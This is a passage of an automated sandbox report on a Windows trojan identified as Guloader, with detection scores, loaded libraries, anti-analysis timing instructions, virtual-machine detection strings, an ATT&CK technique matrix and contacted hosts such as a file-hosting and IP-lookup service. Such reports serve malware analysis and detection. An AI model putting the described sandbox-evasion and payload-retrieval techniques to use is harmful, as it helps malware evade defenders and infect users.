    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: 4AMVusDMPP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: 6%%.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: HP[o0C:\Windows\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb;bK source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 4AMVusDMPP.exe, 00000003.00000002.2139339750.0000000036130000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\Desktop\4AMVusDMPP.PDB source: 4AMVusDMPP.exe, 00000003.00000002.2138609571.00000000334B7000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Configuration.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Windows.Forms.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: Microsoft.VisualBasic.pdb4AMVusDMPP.exe source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: mscorlib.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.pdbMZ source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: \??\C:\Users\user\Desktop\4AMVusDMPP.PDB- source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.00000000032D4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbhb source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.ni.pdb source: WEREF2E.tmp.dmp.7.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WEREF2E.tmp.dmp.7.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_6EAB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EAB1B5F
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeFile created: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeAPI/Special instruction interceptor: Address: 3D7035B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeAPI/Special instruction interceptor: Address: 20D035B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeRDTSC instruction interceptor: First address: 3D332F0 second address: 3D332F0 instructions: 0x00000000 rdtsc 0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D8874DFE1h 0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeRDTSC instruction interceptor: First address: 20932F0 second address: 20932F0 instructions: 0x00000000 rdtsc 0x00000002 cmp di, 0E7Dh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F2D893AACE1h 0x0000000b cmp al, BDh 0x0000000d cmp cl, bl 0x0000000f inc ebp 0x00000010 inc ebx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeMemory allocated: 335C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeMemory allocated: 355C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
    Source: Amcache.hve.7.drBinary or memory string: VMware
    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.7.drBinary or memory string: vmci.sys
    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeAPI call chain: ExitProcess graph end nodegraph_0-4554
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeAPI call chain: ExitProcess graph end nodegraph_0-4710
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_6EAB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6EAB1B5F
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeProcess created: C:\Users\user\Desktop\4AMVusDMPP.exe "C:\Users\user\Desktop\4AMVusDMPP.exe"Jump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeQueries volume information: C:\Users\user\Desktop\4AMVusDMPP.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
    Source: C:\Users\user\Desktop\4AMVusDMPP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    OS Credential Dumping211
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Disable or Modify Tools
    Security Account Manager1
    System Network Configuration Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Access Token Manipulation
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput Capture13
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Process Injection
    LSA Secrets214
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Deobfuscate/Decode Files or Information
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Obfuscated Files or Information
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    4AMVusDMPP.exe61%ReversingLabsWin32.Trojan.Guloader
    4AMVusDMPP.exe100%AviraHEUR/AGEN.1337946
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsc34E8.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    drive.google.com
    142.250.181.238
    truefalse
      high
      drive.usercontent.google.com
      172.217.16.193
      truefalse
        high
        checkip.dyndns.com
        193.122.130.0
        truefalse
          high
          checkip.dyndns.org
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://checkip.dyndns.org/false
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.com4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://drive.google.com/~4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003245000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.usercontent.google.com/4AMVusDMPP.exe, 00000003.00000002.2116843936.0000000003270000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://upx.sf.netAmcache.hve.7.drfalse
                      high
                      http://checkip.dyndns.org4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033634000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://apis.google.com4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://checkip.dyndns.com4AMVusDMPP.exe, 00000003.00000002.2138936838.0000000033641000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://nsis.sf.net/NSIS_ErrorError4AMVusDMPP.exefalse
                              high
                              https://translate.google.com/translate_a/element.js4AMVusDMPP.exe, 00000003.00000003.1827519371.0000000003289000.00000004.00000020.00020000.00000000.sdmp, 4AMVusDMPP.exe, 00000003.00000003.1827398699.0000000003289000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4AMVusDMPP.exe, 00000003.00000002.2138936838.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
